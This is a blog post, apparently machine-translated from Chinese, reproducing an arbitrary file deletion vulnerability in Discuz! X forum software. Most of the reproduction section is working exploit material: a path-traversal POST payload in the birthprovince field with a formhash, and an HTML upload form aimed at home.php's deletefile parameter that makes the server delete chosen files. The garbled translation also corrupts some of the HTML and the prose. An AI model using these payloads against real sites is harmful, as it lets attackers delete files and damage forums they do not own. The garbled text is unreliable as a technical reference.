Discuz! X Front reproduce any file deletion vulnerability

Vulnerability background:
! Discuz the X-software community, is a database constructed using a variety of other excellent performance PHP and MySQL, full-featured, secure and stable community forum platform.

September 29, 2017, Discuz! Fixes a security issue for the strengthening of security, this vulnerability will cause the foreground user can cause arbitrary file delete vulnerability.

September 29, 2017, 404 laboratory know Chong Yu began emergency, after 404 Year-known laboratory analysis confirmed that the vulnerability was submitted to Wooyun vulnerability platform in June 2014, Seebug loophole platform contains the vulnerability, vulnerability numbers ssvid-93588. The vulnerability by configuration property values, delete arbitrary files.

After analysis confirmed that the existing use patterns have been repaired, added formtype judgment on the property, but can lead to incomplete repair mode bypassed, by simulating the file upload can enter other unlink conditions, arbitrary file deletion vulnerability.

Vulnerability to reproduce:
1. Go to Settings - personal data, formhash first find value in the page source code, you can see that the value 2599b5e5
Discuz! X Front reproduce any file deletion vulnerability
2. open a plug-in Hackbar
Post data: birthprovince = .. / .. / .. / importantfile.txt & profilesubmit = 1 & formhash = 2599b5e5
Discuz! X Front reproduce any file deletion vulnerability
after performing displays a blank, and then the next you refresh or re-access the next just fine.
Discuz! X Front reproduce any file deletion vulnerability
Discuz! X Front reproduce any file deletion vulnerability
3. Place of birth is modified to the file you want to delete.
Finally configuration file delete form
<form
Action = " http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa " Method = "the POST" the enctype = "multipart / form-Data" >
<INPUT type = "File" name = "birthprovince" ID = "File" />
<INPUT type = "text" name = "formhash" value = "720c16c3" /> </ P>
<INPUT type = "text" name = "profilesubmit" value = " 1" /> </ p>
<INPUT type = "Submit" value = "the Submit" />
</ from>
Discuz! X Front reproduce any file deletion vulnerability
generation .html, need to make changes to the above.
4. Then just upload an image, you can delete your want to delete.
Discuz! X Front reproduce any file deletion vulnerability
5. go back and look at the longer accessible.
Discuz! X Front reproduce any file deletion vulnerability
Reproduction success.

Guess you like

Origin blog.51cto.com/14259144/2421388
Recommended